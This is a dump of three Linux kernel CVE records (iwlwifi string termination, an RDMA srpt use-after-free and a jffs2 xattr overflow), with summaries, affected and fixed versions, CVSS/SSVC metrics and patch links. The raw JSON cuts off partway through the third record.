EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: dbg-tlv: ensure NUL termination
The iwl_fw_ini_debug_info_tlv is used as a string, so we must
ensure the string is terminated correctly before using it.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a9248de42464e546b624e3fc6a8b04b991af3591 Version: a9248de42464e546b624e3fc6a8b04b991af3591 Version: a9248de42464e546b624e3fc6a8b04b991af3591 Version: a9248de42464e546b624e3fc6a8b04b991af3591 Version: a9248de42464e546b624e3fc6a8b04b991af3591 Version: a9248de42464e546b624e3fc6a8b04b991af3591 Version: a9248de42464e546b624e3fc6a8b04b991af3591 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "a9248de42464"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.5"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "0"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.10.214"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.15.153"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.1.83"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.6.23"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.7.11"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.8.2"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35845",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T17:22:01.418573Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-134",
"description": "CWE-134 Use of Externally-Controlled Format String",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:19:05.842Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.557Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fabe2db7de32a881e437ee69db32e0de785a6209"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/96aa40761673da045a7774f874487cdb50c6a2f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/783d413f332a3ebec916664b366c28f58147f82c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fec14d1cdd92f340b9ba2bd220abf96f9609f2a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/71d4186d470e9cda7cd1a0921b4afda737c6f641"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fabe2db7de32a881e437ee69db32e0de785a6209",
"status": "affected",
"version": "a9248de42464e546b624e3fc6a8b04b991af3591",
"versionType": "git"
},
{
"lessThan": "96aa40761673da045a7774f874487cdb50c6a2f7",
"status": "affected",
"version": "a9248de42464e546b624e3fc6a8b04b991af3591",
"versionType": "git"
},
{
"lessThan": "c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a",
"status": "affected",
"version": "a9248de42464e546b624e3fc6a8b04b991af3591",
"versionType": "git"
},
{
"lessThan": "783d413f332a3ebec916664b366c28f58147f82c",
"status": "affected",
"version": "a9248de42464e546b624e3fc6a8b04b991af3591",
"versionType": "git"
},
{
"lessThan": "fec14d1cdd92f340b9ba2bd220abf96f9609f2a9",
"status": "affected",
"version": "a9248de42464e546b624e3fc6a8b04b991af3591",
"versionType": "git"
},
{
"lessThan": "71d4186d470e9cda7cd1a0921b4afda737c6f641",
"status": "affected",
"version": "a9248de42464e546b624e3fc6a8b04b991af3591",
"versionType": "git"
},
{
"lessThan": "ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea",
"status": "affected",
"version": "a9248de42464e546b624e3fc6a8b04b991af3591",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: dbg-tlv: ensure NUL termination\n\nThe iwl_fw_ini_debug_info_tlv is used as a string, so we must\nensure the string is terminated correctly before using it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:42.675Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fabe2db7de32a881e437ee69db32e0de785a6209"
},
{
"url": "https://git.kernel.org/stable/c/96aa40761673da045a7774f874487cdb50c6a2f7"
},
{
"url": "https://git.kernel.org/stable/c/c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a"
},
{
"url": "https://git.kernel.org/stable/c/783d413f332a3ebec916664b366c28f58147f82c"
},
{
"url": "https://git.kernel.org/stable/c/fec14d1cdd92f340b9ba2bd220abf96f9609f2a9"
},
{
"url": "https://git.kernel.org/stable/c/71d4186d470e9cda7cd1a0921b4afda737c6f641"
},
{
"url": "https://git.kernel.org/stable/c/ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea"
}
],
"title": "wifi: iwlwifi: dbg-tlv: ensure NUL termination",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35845",
"datePublished": "2024-05-17T14:40:12.134Z",
"dateReserved": "2024-05-17T13:50:33.105Z",
"dateUpdated": "2025-05-04T09:06:42.675Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26872 (GCVE-0-2024-26872)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/srpt: Do not register event handler until srpt device is fully setup
Upon rare occasions, KASAN reports a use-after-free Write
in srpt_refresh_port().
This seems to be because an event handler is registered before the
srpt device is fully setup and a race condition upon error may leave a
partially setup event handler in place.
Instead, only register the event handler after srpt device initialization
is complete.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d Version: a42d985bd5b234da8b61347a78dc3057bf7bb94d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26872",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:53:54.471645Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:33.197Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.204Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bdd895e0190c464f54f84579e7535d80276f0fc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6413e78086caf7bf15639923740da0d91fdfd090"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e362d007294955a4fb929e1c8978154a64efdcb6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/85570b91e4820a0db9d9432098778cafafa7d217"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7104a00fa37ae898a827381f1161fa3286c8b346"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec77fa12da41260c6bf9e060b89234b980c5130f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c21a8870c98611e8f892511825c9607f1e2cd456"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/srpt/ib_srpt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bdd895e0190c464f54f84579e7535d80276f0fc5",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "6413e78086caf7bf15639923740da0d91fdfd090",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "e362d007294955a4fb929e1c8978154a64efdcb6",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "85570b91e4820a0db9d9432098778cafafa7d217",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "7104a00fa37ae898a827381f1161fa3286c8b346",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "ec77fa12da41260c6bf9e060b89234b980c5130f",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
},
{
"lessThan": "c21a8870c98611e8f892511825c9607f1e2cd456",
"status": "affected",
"version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/srpt/ib_srpt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/srpt: Do not register event handler until srpt device is fully setup\n\nUpon rare occasions, KASAN reports a use-after-free Write\nin srpt_refresh_port().\n\nThis seems to be because an event handler is registered before the\nsrpt device is fully setup and a race condition upon error may leave a\npartially setup event handler in place.\n\nInstead, only register the event handler after srpt device initialization\nis complete."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:32.678Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bdd895e0190c464f54f84579e7535d80276f0fc5"
},
{
"url": "https://git.kernel.org/stable/c/6413e78086caf7bf15639923740da0d91fdfd090"
},
{
"url": "https://git.kernel.org/stable/c/e362d007294955a4fb929e1c8978154a64efdcb6"
},
{
"url": "https://git.kernel.org/stable/c/85570b91e4820a0db9d9432098778cafafa7d217"
},
{
"url": "https://git.kernel.org/stable/c/7104a00fa37ae898a827381f1161fa3286c8b346"
},
{
"url": "https://git.kernel.org/stable/c/ec77fa12da41260c6bf9e060b89234b980c5130f"
},
{
"url": "https://git.kernel.org/stable/c/c21a8870c98611e8f892511825c9607f1e2cd456"
}
],
"title": "RDMA/srpt: Do not register event handler until srpt device is fully setup",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26872",
"datePublished": "2024-04-17T10:27:32.025Z",
"dateReserved": "2024-02-19T14:20:24.184Z",
"dateUpdated": "2025-05-04T08:58:32.678Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38599 (GCVE-0-2024-38599)
Vulnerability from cvelistv5
Published
2024-06-19 13:45
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jffs2: prevent xattr node from overflowing the eraseblock
Add a check to make sure that the requested xattr node size is no larger
than the eraseblock minus the cleanmarker.
Unlike the usual inode nodes, the xattr nodes aren't split into parts
and spread across multiple eraseblocks, which means that a xattr node
must not occupy more than one eraseblock. If the requested xattr value is
too large, the xattr node can spill onto the next eraseblock, overwriting
the nodes and causing errors such as:
jffs2: argh. node added in wrong place at 0x0000b050(2)
jffs2: nextblock 0x0000a000, expected at 0000b00c
jffs2: error: (823) do_verify_xattr_datum: node CRC failed at 0x01e050,
read=0xfc892c93, calc=0x000000
jffs2: notice: (823) jffs2_get_inode_nodes: Node header CRC failed
at 0x01e00c. {848f,2fc4,0fef511f,59a3d171}
jffs2: Node at 0x0000000c with length 0x00001044 would run over the
end of the erase block
jffs2: Perhaps the file system was created with the wrong erase size?
jffs2: jffs2_scan_eraseblock(): Magic bitmask 0x1985 not found
at 0x00000010: 0x1044 instead
This breaks the filesystem and can lead to KASAN crashes such as:
BUG: KASAN: slab-out-of-bounds in jffs2_sum_add_kvec+0x125e/0x15d0
Read of size 4 at addr ffff88802c31e914 by task repro/830
CPU: 0 PID: 830 Comm: repro Not tainted 6.9.0-rc3+ #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS Arch Linux 1.16.3-1-1 04/01/2014
Call Trace:
<TASK>
dump_stack_lvl+0xc6/0x120
print_report+0xc4/0x620
? __virt_addr_valid+0x308/0x5b0
kasan_report+0xc1/0xf0
? jffs2_sum_add_kvec+0x125e/0x15d0
? jffs2_sum_add_kvec+0x125e/0x15d0
jffs2_sum_add_kvec+0x125e/0x15d0
jffs2_flash_direct_writev+0xa8/0xd0
jffs2_flash_writev+0x9c9/0xef0
? __x64_sys_setxattr+0xc4/0x160
? do_syscall_64+0x69/0x140
? entry_SYSCALL_64_after_hwframe+0x76/0x7e
[...]
Found by Linux Verification Center (linuxtesting.org) with Syzkaller.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe Version: aa98d7cf59b5b0764d3502662053489585faf2fe |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:43.499Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2904e1d9b64f72d291095e3cbb31634f08788b11"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/526235dffcac74c7823ed504dfac4f88d84ba5df"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0eea095ce8c959b86e1e57fe36ca4fea5ae54f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1d21bcd78cf4a4353e1e835789429c6b76aca8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f06969df2e40ab1dc8f4364a5de967830c74a098"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af82d8d2179b7277ad627c39e7e0778f1c86ccdb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d431391320c5c5398ff966fb3a95e68a7def275"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/978a12c91b38bf1a213e567f3c20e2beef215f07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c6854e5a267c28300ff045480b5a7ee7f6f1d913"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38599",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:13:27.704743Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:54.313Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jffs2/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2904e1d9b64f72d291095e3cbb31634f08788b11",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "526235dffcac74c7823ed504dfac4f88d84ba5df",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "f0eea095ce8c959b86e1e57fe36ca4fea5ae54f8",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "a1d21bcd78cf4a4353e1e835789429c6b76aca8b",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "f06969df2e40ab1dc8f4364a5de967830c74a098",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "af82d8d2179b7277ad627c39e7e0778f1c86ccdb",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "8d431391320c5c5398ff966fb3a95e68a7def275",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "978a12c91b38bf1a213e567f3c20e2beef215f07",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
},
{
"lessThan": "c6854e5a267c28300ff045480b5a7ee7f6f1d913",
"status": "affected",
"version": "aa98d7cf59b5b0764d3502662053489585faf2fe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jffs2/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.18"
},
{
"lessThan": "2.6.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "2.6.18",
"vulnerable": true
},
{
